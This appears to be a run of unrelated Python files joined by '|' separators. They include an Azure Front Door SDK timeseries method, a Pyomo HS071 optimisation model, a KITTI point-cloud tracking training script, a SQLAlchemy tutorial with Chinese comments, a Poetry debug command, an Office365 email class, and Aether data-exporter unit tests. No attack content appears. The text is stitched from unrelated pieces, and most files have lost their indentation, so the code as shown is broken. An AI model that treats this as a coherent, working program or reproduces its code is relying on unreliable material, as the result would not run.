include: 'MeasurementCounts', 'LatencyP50', 'LatencyP75', 'LatencyP95'
:type timeseries_type: str or
~azure.mgmt.frontdoor.models.TimeseriesType
:param endpoint: The specific endpoint
:type endpoint: str
:param country: The country associated with the Timeseries. Values are
country ISO codes as specified here-
https://www.iso.org/iso-3166-country-codes.html
:type country: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Timeseries or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.frontdoor.models.Timeseries or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorResponseException<azure.mgmt.frontdoor.models.ErrorResponseException>`
"""
# Construct URL
url = self.get_timeseries.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=80, min_length=1, pattern=r'^[a-zA-Z0-9_\-\(\)\.]*[^\.]$'),
'profileName': self._serialize.url("profile_name", profile_name, 'str', pattern=r'^[a-zA-Z0-9_\-\(\)\.]*[^\.]$'),
'experimentName': self._serialize.url("experiment_name", experiment_name, 'str', pattern=r'^[a-zA-Z0-9_\-\(\)\.]*[^\.]$')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
query_parameters['startDateTimeUTC'] = self._serialize.query("start_date_time_utc", start_date_time_utc, 'iso-8601')
query_parameters['endDateTimeUTC'] = self._serialize.query("end_date_time_utc", end_date_time_utc, 'iso-8601')
query_parameters['aggregationInterval'] = self._serialize.query("aggregation_interval", aggregation_interval, 'str')
query_parameters['timeseriesType'] = self._serialize.query("timeseries_type", timeseries_type, 'str')
if endpoint is not None:
query_parameters['endpoint'] = self._serialize.query("endpoint", endpoint, 'str')
if country is not None:
query_parameters['country'] = self._serialize.query("country", country, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Timeseries', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_timeseries.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/NetworkExperimentProfiles/{profileName}/Experiments/{experimentName}/Timeseries'}
|
# -*- coding: utf-8 -*-
#: Regular python imports
from __future__ import division
from __future__ import print_function
from pyomo.environ import *
__author__ = 'David Thierry' #: May 2018
#: Problem number 71 from the Hock-Schittkowsky test suite
#: https://www.coin-or.org/Ipopt/documentation/node20.html
#: The model
model = ConcreteModel()
#: Set
model.i = Set(initialize=[1,2,3,4])
#: Initial guess (good practice)
x_guess = {1: 1, 2: 5, 3: 4, 4:1}
#: x variables with bounds
model.x = Var(model.i, initialize=x_guess, bounds=(1,5))
#: Constraint
model.con1 = Constraint(
expr=model.x[1]**2 + model.x[2]**2 + model.x[3]**2 + model.x[4]**2 == 40)
#: Objective
model.obj_fun = Objective(sense=minimize,
                          expr=model.x[1] * model.x[4] * (model.x[1] + model.x[2] + model.x[3]) + model.x[3])
#: At this point the model could be part of a function or class, be solved in a script or in the command line
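#: Note: the full HS071 problem also includes the inequality constraint
#: x1*x2*x3*x4 >= 25, which is omitted in the model above.
#: A minimal sketch of solving it from this script, assuming an Ipopt executable
#: (or any other NLP solver Pyomo supports) is available on the PATH:
if __name__ == '__main__':
    solver = SolverFactory('ipopt')
    solver.solve(model, tee=True)
    model.display()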
|
# import json
#
# with open("color.json", "r", encoding='utf-8') as file:
# color = json.load(file)
#
# print(type(file))
import sys
print(sys.argv) |
import numpy as np
import torch
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim
import torch.utils.data
import transforms
import dataset
import models
import cmd_args
import open3d as o3d
from utils_dataset import lines
from torch.utils.tensorboard import SummaryWriter
from loss_fn import iou_projected_to_2d
args = cmd_args.parse_args_from_yaml("/home/mayank/Mayank/TrackThisFlow/configs/test_ours_KITTI.yaml")
basedir = "/home/mayank/Data/KITTI/training/"
writer = SummaryWriter()
val_dataset = dataset.track_and_flow_dataset(basedir,
transform=transforms.ProcessData(args.data_process,
args.num_points,
args.allow_less_points),
gen_func=transforms.GenerateDataUnsymmetric(args),
args=args
)
print("Length of dataset:", len(val_dataset))
val_loader = torch.utils.data.DataLoader(
val_dataset,
batch_size=1,
shuffle=True,
num_workers=4,
pin_memory=True,
worker_init_fn=lambda x: np.random.seed((torch.initial_seed()) % (2 ** 32))
)
model_checker = models.__dict__[args.arch](args)
model_checker = torch.nn.DataParallel(model_checker).cuda()
checkpoint = torch.load(args.resume)
model_checker.load_state_dict(checkpoint['state_dict'], strict=True)
print("Pretrained weights loaded!")
# model = model.cuda()
model_checker.eval()
model = models.__dict__[args.arch](args)
model = torch.nn.DataParallel(model).cuda()
checkpoint = torch.load(args.resume)
model.load_state_dict(checkpoint['state_dict'], strict=True)
print("Pretrained weights loaded!")
# model = model.cuda()
model.train()
viz = True
def nearest_neighbour(x, y):
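    """One-sided nearest-neighbour (Chamfer-style) loss term.

    x and y are batched (1, 3, N) point clouds. For every point in y the squared
    distance to its closest point in x is computed; the sum is normalised by the
    number of points in x. Used below to pull the flow-warped pc1 towards pc2.
    """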
x = x[0]
y = y[0]
x = x.transpose(0,1)
y = y.transpose(0,1)
n = x.size(0)
m = y.size(0)
d = x.size(1)
x = x.unsqueeze(1).expand(n, m, d)
y = y.unsqueeze(0).expand(n, m, d)
dist = torch.pow(x - y, 2).sum(2)
nn_dists = torch.min(dist, axis=0).values
return torch.sum(nn_dists)/n
criterion = torch.nn.MSELoss().cuda()
optimizer = torch.optim.Adam(model.parameters(), lr=0.00001)
for epoch in range(1):
# with torch.no_grad():
skipped = 0
for i, (pc1, pc2, generated_data, box1, box2, skip) in enumerate(val_loader):
if(i%1000 == 0):
state = {
'epoch': epoch + 1, # next start epoch
'arch': args.arch,
'state_dict': model.state_dict(),
'min_loss': 0,
'optimizer': optimizer.state_dict(),
}
torch.save(state, str(i) + 'newModel.pth.tar')
print("Model saved at iteration:", i)
if(skip==1):
skipped += 1
continue
box1 = box1.cuda()
box2 = box2.cuda()
output = model(pc1, pc2, generated_data)
pc1 = pc1.cuda()
pc2 = pc2.cuda()
output_mean_translation = torch.mean(output,axis=2)
translated_box1 = box1 + output_mean_translation
translated_box1 = translated_box1.view(translated_box1.size(0), -1)
box2 = box2.view(box2.size(0), -1)
box2_for_mse = box2.view(-1,8,3)[:,:4,:]
# box2_for_mse = box2_for_mse.view(box2_for_mse.size(0), -1)
translated_box1_for_mse = translated_box1.view(-1,8,3)[:,:4,:]
# translated_box1_for_mse = translated_box1_for_mse.view(translated_box1_for_mse.size(0),-1)
# intersection = intersection_area_projected_to_2d(translated_box1_for_mse, box2_for_mse)
loss_translation = criterion(translated_box1_for_mse, box2_for_mse)#criterion(translated_box1, box2)
loss_nn = nearest_neighbour(pc1+output, pc2)
loss = 1-iou_projected_to_2d(translated_box1_for_mse, box2_for_mse) + loss_nn*10
# print(loss)
# brak
optimizer.zero_grad()
loss.backward()
optimizer.step()
if(i%5 == 0):
print("Epoch", epoch, "| Iteration:", i, " | Translation Loss:", loss_translation.item(), "| NN Loss:", loss_nn.item(), "| Total Loss:", loss.item(), " | Skipped:", skipped)
writer.add_scalar("translation_loss", loss_translation.item(), epoch*(len(val_dataset) + i))
writer.add_scalar("nn_loss", loss_nn.item(), epoch*(len(val_dataset)) + i)
writer.add_scalar("total_loss", loss.item(), epoch*(len(val_dataset)) + i)
if(True):
output_checker = model_checker(pc1, pc2, generated_data)
output_mean_translation_checker = torch.mean(output_checker,axis=2)
translated_box1_checker = box1 + output_mean_translation_checker
translated_box1_checker = translated_box1_checker.view(translated_box1_checker.size(0),-1)
translated_box1 = translated_box1.view(-1,8,3).data.cpu().numpy()[0]
colors = [[0, 1, 0] for i in range(len(lines))]
line_set_translated_box1 = o3d.geometry.LineSet(
points=o3d.utility.Vector3dVector(translated_box1),
lines=o3d.utility.Vector2iVector(lines),
)
line_set_translated_box1.colors = o3d.utility.Vector3dVector(colors)
translated_box1_checker = translated_box1_checker.view(-1,8,3).data.cpu().numpy()[0]
colors = [[0, 0, 0] for i in range(len(lines))]
line_set_translated_box1_checker = o3d.geometry.LineSet(
points=o3d.utility.Vector3dVector(translated_box1_checker),
lines=o3d.utility.Vector2iVector(lines),
)
line_set_translated_box1_checker.colors = o3d.utility.Vector3dVector(colors)
non_translated_box1 = box1.view(-1,8,3)[0] #+ output_mean_translation
non_translated_box1 = non_translated_box1.data.cpu().numpy()
colors = [[0, 0, 1] for i in range(len(lines))]
line_set_non_translated_box1 = o3d.geometry.LineSet(
points=o3d.utility.Vector3dVector(non_translated_box1),
lines=o3d.utility.Vector2iVector(lines),
)
line_set_non_translated_box1.colors = o3d.utility.Vector3dVector(colors)
non_translated_box2 = box2.view(-1,8,3)[0] #+ output_mean_translation
non_translated_box2 = non_translated_box2.data.cpu().numpy()
colors = [[1, 0, 0] for i in range(len(lines))]
line_set_non_translated_box2 = o3d.geometry.LineSet(
points=o3d.utility.Vector3dVector(non_translated_box2),
lines=o3d.utility.Vector2iVector(lines),
)
line_set_non_translated_box2.colors = o3d.utility.Vector3dVector(colors)
projected = pc1.data.cpu().numpy() + output.data.cpu().numpy()
projected = projected[0].transpose()
projected_checker = pc1.data.cpu().numpy() + output_checker.data.cpu().numpy()
projected_checker = projected_checker[0].transpose()
pc1 = pc1.data.cpu().numpy()[0].transpose()
pc2 = pc2.data.cpu().numpy()[0].transpose()
pcd1 = o3d.geometry.PointCloud()
pcd1.points = o3d.utility.Vector3dVector(pc1)
pcd1.paint_uniform_color((0.0,0.0,1.0))
pcd2 = o3d.geometry.PointCloud()
pcd2.points = o3d.utility.Vector3dVector(pc2)
pcd2.paint_uniform_color((1.0,0.0,0.0))
pcd3 = o3d.geometry.PointCloud()
pcd3.points = o3d.utility.Vector3dVector(projected)
pcd3.paint_uniform_color((0.0,1.0,0.0))
pcd4 = o3d.geometry.PointCloud()
pcd4.points = o3d.utility.Vector3dVector(projected_checker)
pcd4.paint_uniform_color((0.0,0.0,0.0))
o3d.visualization.draw_geometries([pcd1, pcd2, pcd3, pcd4, line_set_translated_box1, line_set_non_translated_box1, line_set_non_translated_box2, line_set_translated_box1_checker])
|
from dbconn import Departments, Employees, Session
#######################################
# Create a session connected to the database
session = Session()
#######################################
# Adding a record means creating an instance of the mapped class
# hr = Departments(dep_id=1, dep_name='人事部')
# ops = Departments(dep_id=2, dep_name='运维部')
# dev = Departments(dep_id=3, dep_name='开发部')
# qa = Departments(dep_id=4, dep_name='测试部')
# sales = Departments(dep_id=5, dep_name='销售部')
# market = Departments(dep_id=6, dep_name='市场部')
# session.add_all([hr, ops, dev, qa, sales, market])
#######################################
# Add employees
# lb = Employees(
# emp_id=1, emp_name='刘备',
# birth_date='1975-03-18', email='lb@qq.com', dep_id=1
# )
# gy = Employees(
# emp_id=2, emp_name='关羽',
# birth_date='1980-2-15', email='gy@qq.com', dep_id=2
# )
# zf = Employees(
# emp_id=3, emp_name='张飞',
# birth_date='1982-10-3', email='zf@qq.com', dep_id=2
# )
# zy = Employees(
# emp_id=4, emp_name='赵云',
# birth_date='1995-4-19', email='zy@163.com', dep_id=2
# )
# hz = Employees(
# emp_id=5, emp_name='黄忠',
# birth_date='1970-1-1', email='hz@126.com', dep_id=3
# )
# wy = Employees(
# emp_id=6, emp_name='魏严',
# birth_date='1993-6-13', email='wy@163.com', dep_id=3
# )
# session.add_all([lb, gy, zf, zy, hz, wy])
#######################################
# When the class itself is passed to query(), the result is a set of instances
# qset1 = session.query(Departments)
# print(qset1)  # qset1 is a SQL statement; it only executes and returns results when the values are read
# for dep in qset1:
# print(dep.dep_id, dep.dep_name)
#######################################
# When class attributes are passed to query(), the result is a query set of tuples
# qset2 = session.query(Departments.dep_id, Departments.dep_name)
# for dep in qset2:
# print(dep)
#######################################
# Ordering
# qset3 = session.query(Departments).order_by(Departments.dep_id)
# for dep in qset3:
# print(dep.dep_id, dep.dep_name)
# print('*' * 30)
#
# for dep in qset3[2:5]:
# print(dep.dep_id, dep.dep_name)
#######################################
# Filtering
# qset4 = session.query(Departments).filter(Departments.dep_id>=3)
# for dep in qset4:
# print(dep.dep_id, dep.dep_name)
#
# print('*' * 30)
#
# qset5 = session.query(Departments).filter(Departments.dep_id>=3)\
# .filter(Departments.dep_id<6)
# for dep in qset5:
# print(dep.dep_id, dep.dep_name)
#######################################
# qset6 = session.query(Employees).filter(Employees.email.like('%@qq.com'))
# for emp in qset6:
# print(emp.emp_name, emp.email)
#######################################
# qset7 = session.query(Departments).filter(Departments.dep_id.in_([1, 3]))
# for dep in qset7:
# print(dep.dep_id, dep.dep_name)
#######################################
# qset8 = session.query(Departments.dep_id, Departments.dep_name)
# print(qset8)          # qset8 is a SQL statement
# print(qset8.all())    # all() returns a list
# print(qset8.first())  # first() returns the first item of all()
#######################################
# qset9 = session.query(Departments.dep_id, Departments.dep_name)\
# .filter(Departments.dep_id==20)
# # one() requires the query to return exactly one row; zero or several rows raise an error
# print(qset9.one())
#######################################
# Multi-table query; by default SQLAlchemy resolves the join from the primary/foreign key constraints
# When Employees is passed to query(), join on Departments, and vice versa
# qset10 = session.query(Employees.emp_name, Departments.dep_name)\
# .join(Departments)
# print(qset10.all())
#######################################
# Updating: just reassign attributes on the fetched instance
# qset11 = session.query(Departments).filter(Departments.dep_name=='人事部')
# hr = qset11.one()
# hr.dep_name = '人力资源部'
#######################################
# Deleting: fetch the instance first, then delete it
qset12 = session.query(Departments).filter(Departments.dep_id==6)
sales = qset12.one()
session.delete(sales)
#######################################
session.commit()  # commit the changes
session.close()   # close the session connection
|
import sys
from clikit.args import StringArgs
from ..command import Command
class DebugInfoCommand(Command):
name = "info"
description = "Shows debug information."
def handle(self):
poetry_python_version = ".".join(str(s) for s in sys.version_info[:3])
self.line("")
self.line("<b>Poetry</b>")
self.line(
"\n".join(
[
"<info>Version</info>: <comment>{}</>".format(self.poetry.VERSION),
"<info>Python</info>: <comment>{}</>".format(
poetry_python_version
),
]
)
)
args = StringArgs("")
command = self.application.get_command("env").get_sub_command("info")
return command.run(args, self._io)
|
from office365.runtime.client_value import ClientValue
from office365.runtime.client_value_collection import ClientValueCollection
class EmailProperties(ClientValue):
def __init__(self, body, subject, to, from_address=None, cc=None, bcc=None, additional_headers=None):
"""
:param str body:
:param str subject:
:param list[str] to:
:param str or None from_address:
:param list[str] or None cc:
:param list[str] or None bcc:
:param dict or None additional_headers:
"""
super(EmailProperties, self).__init__()
self.Body = body
self.Subject = subject
self.From = from_address
self.To = ClientValueCollection(str, to)
self.CC = ClientValueCollection(str, cc)
self.BCC = ClientValueCollection(str, bcc)
self.AdditionalHeaders = additional_headers
@property
def entity_type_name(self):
return "SP.Utilities.EmailProperties"
|
# Copyright (C) 2019 by eHealth Africa : http://www.eHealthAfrica.org
#
# See the NOTICE file distributed with this work for additional information
# regarding copyright ownership.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import json
from unittest import mock
import os
import requests
import tempfile
import zipfile
from copy import deepcopy
from random import shuffle
from openpyxl import load_workbook
from django.contrib.auth import get_user_model
from django.core.files.uploadedfile import SimpleUploadedFile
from django.db import connection
from django.db.models import F
from django.test import TransactionTestCase, TestCase, override_settings, tag
from django.urls import reverse
from aether.kernel.api import models
from aether.kernel.api.entity_extractor import run_extraction
from aether.kernel.api.project_artefacts import upsert_project_with_avro_schemas
from aether.kernel.api.utils import safe_sleep
from aether.kernel.api.exporter import (
__filter_paths as filter_paths,
__filter_headers as filter_headers,
__order_headers as order_headers,
__flatten_dict as flatten_dict,
__get_label as get_label,
__generate_csv_files as gen_csv_files,
__prepare_xlsx as gen_xlsx,
__prepare_zip as gen_zip,
execute_records_task,
execute_attachments_task,
CSV_FORMAT,
XLSX_FORMAT,
MAX_SIZE,
DEFAULT_OPTIONS,
)
here = os.path.dirname(os.path.realpath(__file__))
EXAMPLE_PATHS = [
'country',
'region',
'name',
'location',
'location.latitude',
'location.longitude',
'location.altitude',
'location.accuracy',
'location_none',
'location_none.latitude',
'location_none.longitude',
'location_none.altitude',
'location_none.accuracy',
'image',
'number',
'number2',
'date',
'datetime',
'option',
'option_a',
'option_a.choice_a',
'option_b',
'option_b.choice_b',
'lang',
'lang.#',
'iterate',
'iterate.#',
'iterate.#.index',
'iterate.#.value',
'iterate_one',
'iterate_one.#',
'iterate_one.#.item',
'iterate_none',
'iterate_none.#',
'iterate_none.#.nothing',
'id',
]
EXAMPLE_LABELS = {
'_id': 'xForm ID',
'_version': 'xForm version',
'country': 'Country',
'region': 'Region',
'name': 'What is your name?',
'location': 'Collect your GPS coordinates',
'location.latitude': 'latitude',
'location.longitude': 'longitude',
'location.altitude': 'altitude',
'location.accuracy': 'accuracy',
'location_none': 'Ignore your GPS coordinates',
'location_none.latitude': 'latitude',
'location_none.longitude': 'longitude',
'location_none.altitude': 'altitude',
'location_none.accuracy': 'accuracy',
'image': 'Take a picture',
'number': 'How many?',
'number2': 'Percentage',
'date': 'When?',
'datetime': 'At?',
'option': 'Choice (A/B)',
'option_a': 'Option A',
'option_a.choice_a': 'Choice A',
'option_b': 'Option B',
'option_b.choice_b': 'Choice B',
'lang': 'Spoken languages',
'iterate': 'Indicate loop elements',
'iterate.#.index': 'Index',
'iterate.#.value': 'Value',
'iterate_one': 'Indicate one',
'iterate_one.#.item': 'Item',
'iterate_none': 'Indicate none',
'iterate_none.#.nothing': 'None',
'id': 'ID',
}
def helper__generate_file(
temp_dir,
data,
paths=[],
labels={},
file_format=CSV_FORMAT,
filename='export',
offset=0,
limit=MAX_SIZE,
options=DEFAULT_OPTIONS,
):
'''
Generates an XLSX/ZIP (of CSV files) file with the given data.
- ``data`` a queryset with two main properties ``EXPORT_FIELD_ID``
and ``EXPORT_FIELD_DATA``.
- ``paths`` is a list with the allowed jsonpaths.
- ``labels`` is a dictionary whose keys are the jsonpaths
and the values the linked labels to use as header for that jsonpath.
- ``file_format``, expected values ``xlsx`` or ``csv``.
- ``options`` the export options.
'''
sql, params = data.query.sql_with_params()
with connection.cursor() as cursor:
sql_sentence = cursor.mogrify(sql, params).decode('utf-8')
csv_files = gen_csv_files(temp_dir,
sql_sentence,
paths,
labels,
offset,
limit,
options,
)
if file_format == XLSX_FORMAT:
return gen_xlsx(temp_dir, csv_files, filename)
else:
return gen_zip(temp_dir, csv_files, filename)
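# A short usage sketch mirroring the tests below (``data`` must expose ``id`` and ``exporter_data``):
#   data = models.Submission.objects.annotate(exporter_data=F('payload')).values('id', 'exporter_data')
#   with tempfile.TemporaryDirectory() as temp_dir:
#       _, zip_path = helper__generate_file(temp_dir, data, paths=EXAMPLE_PATHS, labels=EXAMPLE_LABELS)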
class ExporterTest(TestCase):
def test__flatten_dict(self):
item = {
'a': {
'b': 1,
'z': 'z',
},
'c': {
'd': [{'f': 2}],
},
'e': [1, 2, 3],
}
expected = {
'a.b': 1,
'a.z': 'z',
'c.d': [{'f': 2}],
'e': [1, 2, 3],
}
expected_flatten = {
'a.b': 1,
'a.z': 'z',
'c.d.1.f': 2,
'e.1': 1,
'e.2': 2,
'e.3': 3,
}
self.assertEqual(flatten_dict({}), {})
self.assertEqual(flatten_dict(item), expected)
self.assertEqual(flatten_dict(item, flatten_list=True), expected_flatten)
self.assertEqual(flatten_dict(flatten_dict(item)), expected) # idempotent
def test__filter_paths(self):
paths = [
'a',
'a.b',
'a.b.*',
'a.b.*.#',
'a.b.*.#.x',
'a.c',
'a.c.#',
'a.c.#.y',
'a.d',
'a.d.?',
'a.d.?.e',
'a.f',
'a.f.g',
'z',
]
expected = [
'a.b',
'a.c',
'a.d',
'a.f.g',
'z',
]
self.assertEqual(filter_paths(paths), expected)
self.assertEqual(filter_paths(filter_paths(paths)), expected)
def test__filter_headers(self):
prefix = ['@', '@id']
headers = ['a', 'x', 'z', 'c', 'd']
# nothing changes
self.assertEqual(filter_headers([], '$', headers), headers)
# includes prefix, filters and orders the headers
self.assertEqual(filter_headers(['a', 'w', 'd', 'z'], '$', headers), prefix + ['a', 'd', 'z'])
def test__filter_headers__list(self):
paths = ['b', 'a'] # not in alphabetical order
prefix = ['@', '@id']
expected = [
'b.1', 'b.2', 'b.3', 'b.4', 'b.5',
'a.1', 'a.2', 'a.3', 'a.4', 'a.5',
]
headers = deepcopy(expected)
for _ in range(5):
shuffle(headers) # change the order of the elements
self.assertNotEqual(headers, expected)
self.assertEqual(filter_headers(paths, '$', headers), prefix + expected)
def test__filter_headers__nested_list(self):
paths = ['b', 'a'] # not in alphabetical order
prefix = ['@', '@id']
expected = [
'b.1.1', 'b.1.2', 'b.1.3', 'b.1.4', 'b.1.5', 'b.2.1',
'a.1.1', 'a.1.2', 'a.1.3', 'a.2.1', 'a.2.2', 'a.3.1',
]
headers = deepcopy(expected)
for _ in range(5):
shuffle(headers) # change the order of the elements
self.assertNotEqual(headers, expected)
self.assertEqual(filter_headers(paths, '$', headers), prefix + expected)
def test__order_headers__documented_case(self):
headers = [
'ZZZ',
'w.2.b.1',
'w.1.a.1',
'w.2.a',
'XXX',
'b.2',
'w.3',
'w.2.b.2',
'YYY',
'c.1',
'w.1.c.1',
'w.1.c.2',
'c.2',
'b.4',
]
expected = [
'ZZZ',
'w.1.a.1',
'w.1.c.1',
'w.1.c.2',
'w.2.b.1',
'w.2.b.2',
'w.2.a',
'w.3',
'XXX',
'b.2',
'b.4',
'YYY',
'c.1',
'c.2',
]
self.assertEqual(order_headers(headers), expected)
def test__get_label(self):
labels = {
'a': 'Root',
'a.d.#.e': 'The indexed E',
'a.*.c': 'The Big C',
'a.*.c.?.u': 'Join',
'x.y.?.z': 'Union'
}
# should find simple nested properties
self.assertEqual(get_label('a', labels), 'Root')
self.assertEqual(get_label('@.a', labels), 'Root')
self.assertEqual(get_label('@.a', content='path'), 'a')
self.assertEqual(get_label('a.b'), 'A / B')
self.assertEqual(get_label('a.b', single=True), 'B')
self.assertEqual(get_label('a.b', content='path', single=True), 'b')
self.assertEqual(get_label('a.b', content='path', joiner=':'), 'a:b')
# should detect array properties
self.assertEqual(get_label('a.d.#.e', labels), 'Root / D / # / The indexed E')
self.assertEqual(get_label('a.d.#.e', labels, single=True), 'The indexed E')
self.assertEqual(get_label('a.d.#.e', labels, joiner=' : '), 'Root : D : # : The indexed E')
# should detect map properties
self.assertEqual(get_label('a.x.c', labels), 'Root / X / The Big C')
self.assertEqual(get_label('a.x_x.c', labels), 'Root / X x / The Big C')
self.assertEqual(get_label('a.x__1_x.c', labels), 'Root / X 1 x / The Big C')
self.assertEqual(get_label('a.x__1._x.c', labels), 'Root / X 1 / X / C')
self.assertEqual(get_label('a.x.c.z', labels), 'Root / X / The Big C / Z')
self.assertEqual(get_label('a.x_x.c.z', labels), 'Root / X x / The Big C / Z')
self.assertEqual(get_label('a.x__1_x.c.z', labels), 'Root / X 1 x / The Big C / Z')
self.assertEqual(get_label('a.x__1_x.c.z', labels, joiner=' - '), 'Root - X 1 x - The Big C - Z')
# should detect union properties
self.assertEqual(get_label('a.x.c.u', labels), 'Root / X / The Big C / Join')
self.assertEqual(get_label('a.x_x.c.u', labels), 'Root / X x / The Big C / Join')
self.assertEqual(get_label('a.x__1_x.c.u', labels), 'Root / X 1 x / The Big C / Join')
self.assertEqual(get_label('a.x__1._x.c.u', labels), 'Root / X 1 / X / C / U')
self.assertEqual(get_label('x.y.z', labels), 'X / Y / Union')
self.assertEqual(get_label('x.y.a.z', labels), 'X / Y / A / Z')
def test__endpoints(self):
self.assertEqual(reverse('submission-xlsx'), '/submissions/xlsx/')
self.assertEqual(reverse('submission-csv'), '/submissions/csv/')
self.assertEqual(reverse('entity-xlsx'), '/entities/xlsx/')
self.assertEqual(reverse('entity-csv'), '/entities/csv/')
@tag('nonparallel')
@override_settings(MULTITENANCY=False)
class ExporterViewsTest(TransactionTestCase):
def setUp(self):
super(ExporterViewsTest, self).setUp()
username = 'test'
email = 'test@example.com'
password = 'testtest'
self.user = get_user_model().objects.create_user(username, email, password)
self.assertTrue(self.client.login(username=username, password=password))
with open(os.path.join(here, 'files/export.avsc'), 'rb') as in_file:
self.EXAMPLE_SCHEMA = json.load(in_file)
with open(os.path.join(here, 'files/export.json'), 'rb') as in_file:
self.EXAMPLE_PAYLOAD = json.load(in_file)
self.helper__create_project(1)
self.assertEqual(models.Project.objects.count(), 1)
self.assertEqual(models.Submission.objects.count(), 1)
self.assertEqual(models.Entity.objects.count(), 1)
self.assertEqual(models.ExportTask.objects.count(), 0)
def tearDown(self):
self.client.logout()
super(ExporterViewsTest, self).tearDown()
def helper__create_project(self, index):
project = models.Project.objects.create(
name=f'project_{index}',
)
# create artifacts for the AVRO schema
artifacts_id = str(project.pk)
upsert_project_with_avro_schemas(
project_id=artifacts_id,
avro_schemas=[{
'id': artifacts_id,
'name': f'export_{index}',
'definition': self.EXAMPLE_SCHEMA,
}],
)
submission = models.Submission.objects.create(
payload=dict(self.EXAMPLE_PAYLOAD),
mappingset=models.MappingSet.objects.get(pk=artifacts_id),
)
# extract entities
run_extraction(submission)
# -----------------------------
# GENERATE FILES
# -----------------------------
def test__generate__csv(self):
kwargs = {
'labels': EXAMPLE_LABELS,
'file_format': CSV_FORMAT,
'offset': 0,
'limit': 1,
}
# without paths (includes: ``aether_extractor_enrichment``)
data = models.Submission.objects.annotate(exporter_data=F('payload')).values('id', 'exporter_data')
with tempfile.TemporaryDirectory() as temp_dir:
_, zip_path = helper__generate_file(temp_dir, data, paths=[], **kwargs)
zip_file = zipfile.ZipFile(zip_path, 'r')
self.assertEqual(zip_file.namelist(),
['export.csv', 'export.1.csv', 'export.2.csv', 'export.3.csv', 'export.4.csv'])
# with the whole paths list (there are 3 arrays with data, ``iterate_none`` is empty)
data = models.Submission.objects.annotate(exporter_data=F('payload')).values('id', 'exporter_data')
with tempfile.TemporaryDirectory() as temp_dir:
_, zip_path = helper__generate_file(temp_dir, data, paths=EXAMPLE_PATHS, **kwargs)
zip_file = zipfile.ZipFile(zip_path, 'r')
self.assertEqual(zip_file.namelist(),
['export.csv', 'export.1.csv', 'export.2.csv', 'export.3.csv'])
# without `iterate_one` in paths
paths = [path for path in EXAMPLE_PATHS if not path.startswith('iterate_one')]
with tempfile.TemporaryDirectory() as temp_dir:
_, zip_path = helper__generate_file(temp_dir, data, paths=paths, **kwargs)
zip_file = zipfile.ZipFile(zip_path, 'r')
self.assertEqual(zip_file.namelist(),
['export.csv', 'export.1.csv', 'export.2.csv'])
# with `flatten` option should generate only one file
with tempfile.TemporaryDirectory() as temp_dir:
_, zip_path = helper__generate_file(
temp_dir,
data,
paths=[],
options={
'header_content': 'paths',
'header_separator': '*',
'header_shorten': 'no',
'data_format': 'flatten',
},
**kwargs,
)
zip_file = zipfile.ZipFile(zip_path, 'r')
self.assertEqual(zip_file.namelist(), ['export.csv'])
def test__generate__xlsx__split(self):
_id = str(models.Submission.objects.first().pk)
data = models.Submission.objects.annotate(exporter_data=F('payload')).values('id', 'exporter_data')
with tempfile.TemporaryDirectory() as temp_dir:
_, xlsx_path = helper__generate_file(
temp_dir,
data,
paths=EXAMPLE_PATHS,
labels=EXAMPLE_LABELS,
file_format=XLSX_FORMAT,
offset=0,
limit=1,
options={
'header_content': 'both', # includes paths and labels
'header_separator': '—',
'header_shorten': 'no',
'data_format': 'split',
},
)
wb = load_workbook(filename=xlsx_path, read_only=True)
# check workbook content
ws = wb['0'] # root content
# check headers: paths
self.assertEqual(ws['A1'].value, '@')
self.assertEqual(ws['B1'].value, '@id')
self.assertEqual(ws['C1'].value, 'country')
self.assertEqual(ws['D1'].value, 'region')
self.assertEqual(ws['E1'].value, 'name')
self.assertEqual(ws['F1'].value, 'location—latitude')
self.assertEqual(ws['G1'].value, 'location—longitude')
self.assertEqual(ws['H1'].value, 'location—altitude')
self.assertEqual(ws['I1'].value, 'location—accuracy')
self.assertEqual(ws['J1'].value, 'image')
self.assertEqual(ws['K1'].value, 'number')
self.assertEqual(ws['L1'].value, 'number2')
self.assertEqual(ws['M1'].value, 'date')
self.assertEqual(ws['N1'].value, 'datetime')
self.assertEqual(ws['O1'].value, 'option')
self.assertEqual(ws['P1'].value, 'option_a—choice_a')
self.assertEqual(ws['Q1'].value, 'id')
# check headers: labels
self.assertEqual(ws['A2'].value, '@')
self.assertEqual(ws['B2'].value, '@id')
self.assertEqual(ws['C2'].value, 'Country')
self.assertEqual(ws['D2'].value, 'Region')
self.assertEqual(ws['E2'].value, 'What is your name?')
self.assertEqual(ws['F2'].value, 'Collect your GPS coordinates — latitude')
self.assertEqual(ws['G2'].value, 'Collect your GPS coordinates — longitude')
self.assertEqual(ws['H2'].value, 'Collect your GPS coordinates — altitude')
self.assertEqual(ws['I2'].value, 'Collect your GPS coordinates — accuracy')
self.assertEqual(ws['J2'].value, 'Take a picture')
